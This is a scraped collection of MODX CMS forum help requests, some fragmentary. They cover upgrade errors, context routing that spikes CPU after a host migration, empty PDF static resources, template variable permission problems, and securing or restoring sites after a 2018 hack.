So my question is: Does a higher version will have the same problem with mod_security? Will a manual upgrade under this hosting environment solve my problem?]]>

Error: Could not get version list from GitHub -- No Code Returned Connection error (no internet?)
Error: Regex failed

I'm using the latest version of Upgrade Modx 2.1.1-pl
The previous version had a error - but it was a diferent one (and i can't remember what it was)
The version before that worked.

I did update the php version on the server - would that cause it? It's php 7.2 on an apache server. Details on what I can choose in the screen shot.
MySQL 5.6

Any thoughts?

<![CDATA[Moved to New Host (A2): Contexts that are not "web" spike Server CPU/Memory as does manager using non-web context URL]]> https://forums.modx.com/thread/104646/moved-to-new-host-a2-contexts-that-are-not-web-spike-server-cpu-memory-as-does-manager-using-non-web-context-url#dis-post-562848
First of all, I'm not a progammer.

Because Site5 hosting arbitrarily changed A records without notifying us with some frequency and we had a lot of performance issues we moved two MODX based sites (each with 3 contexts) to A2 (A2 did a cPanel based migration from Site5).

Note: Both MODX based installs are up to date at 2.6.5 and Extras updated before the move.

Logged in the first time and everything was much faster.

However, an issue has arised that I cannot solve.

If we visit a context that is not the "web" context but another one with the correct Context Settings, ie.

base_url: /
http_host: domain.com
site_url: http://domain.com/

Obviously with real domains. The additional domains are Aliases in cPanel that point to public_html. At first was using ContextRouter for routing to contexts but have replaced it with xRouting. We have of course changed the A record for each domain to point to the new server.

Every context renders so we know that the A records are fine and redirecting to the correct context is at least partially fine.

But the issue is if we visit a URL for a context that is not "web" the server's CPU and Memory skyrockets and the sites eventually return a 500 error until after a few minutes when the server goes back to normal (we usually close the page we visited as well). When we go to the other context, of course, it's very slow right way, often refusing to render images.

So I'm thinking there has to be an issue with routing but I can't figure out what it is.

The main differences between the old server are:

PHP 7.1 instead of 5.6
Let's Encryt SSL is automatically installed

And the following was added to the standard MODX .htacess:

RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$

I commented them out but this made no difference.
MODX error log shows nothing.

On the other MODX install on A2 (different account then the other), when a user logs into the manager using a non "web" context again the server's CPU and Memory skyrockets and the sites eventually return a 500 error until after a few minutes when the server goes back to normal.

At first we thought it was bots hitting the sites in bulk but have use robots.txt to deny most of them.

My suspicion is it has something to do with the free SSL but we aren't trying to use https:// in any of the above situations.

Anyone have any ideas or have had a similar experience?]]>

I have an old and quite big website built on MODX 2.2.14. I've been testing if the update to 2.6.5 was possible but that resulted in fatal errors with getResources extra (used on most of the pages), therefore we decided to stay with 2.2.14.

Apparently, the website got hacked by the global hack that happened in July... Is there any way to amend some of my 2.2.14 files to prevent the hack from happening again? I'm just looking for a solution which would close door for this annoying hack without having to upgrade MODX to 2.6.5

The mod plugins that appear in the log are the following:

23-> ArticlesPlugin
The line 26 that says in the log is the following:
switch ($modx->event->name) {

Basically, is the first line of the file.

30-> CustomRoutingService
The line 4 that says in the log is the following:
$modx->log(xPDO::LOG_LEVEL_DEBUG, $_SERVER['REQUEST_URI']);

When the sites go down, shows a nginx 504 Gateway Error. Stay like 1-2 minutes down and after this time, the site goes up again without doing anything.

Anyone could help me with that? Many thanks in advance!

Now, I have been looking into security, and hardening MODx. Great article here: http://rtfm.modx.com/revolution/2.x/administering-your-site/security/hardening-modx-revolution

I have a couple of questions:
If I follow those suggestions (putting /core and /manager) up a level -
do I need to move config.core.php up a level as well?
and how will I access to the manager?

<![CDATA[Static Resource empty]]> https://forums.modx.com/thread/80134/static-resource-empty?page=3#dis-post-561691
I created a few static resources in Revo 2.2.5 and linked them to PDF-files from a media source (basePath = assets/media/downloads/, basePathRelative = Yes, baseUrl = assets/media/downloads/, baseUrlRelative = Yes). I created a Content-Type for those PDF-files (MIME-Type application/pdf, Binary) and selected it in the static resources.

However, when I attempt to access the static resource, I only get an empty (=zero bytes) PDF-document. I don't see any errors in the ModX error log.

Has anyone any idea what's required and what to try to get this to work? Thanks in advance!

Does anyone have any ideas what the issue might be here? I can DM over the full bug list if that would help?

Appreciate any insight here!

Cheers,

<![CDATA[New user unable to edit template variable settings and wiping them on saving document]]> https://forums.modx.com/thread/91993/new-user-unable-to-edit-template-variable-settings-and-wiping-them-on-saving-document#dis-post-560685
I'm using Modx Revolution 2.2.

I have created a new user using the Administrator policy template. The only think I have deselected is access to the Element tab. (Although have also tried with that enabled and get the same result).

All is working well except.... the user can't edit template variables which contain images. When they first open the page they can see the url of the image in the template variable but they can't edit it. When they go to save a page the link to the images disappears, and the image has gone from the page. They are able update and save Template Variables which are text fields, this only applies to those which have images in them.

I've retraced my steps many many times to try and see if there is a simple mistake, and have played around with various settings but I'm stuck now as to what could be causing this. Happy to share the user access details if you are able to help but any pointer in even the general direction of something that might help would be great. I've been playing around with permissions and users for 2 days and its starting to get a little frustrating now.

Thanks in advance
Naomi

<![CDATA[Need help, site is running 2.6.5 but can't click on the Update option in Manager]]> https://forums.modx.com/thread/104159/need-help-site-is-running-2-6-5-but-can-t-click-on-the-update-option-in-manager#dis-post-560660
Need help very badly. I think our website was affected by last week's attacks. So, we requested our web host to update our website to 2.6.5. They installed it I think but I got an email saying that they can't click on the Upgrade Existing Install option from Setup link.

See attached.

What do I do to restore/update site?

Any help would be appreciated.

Thank you,
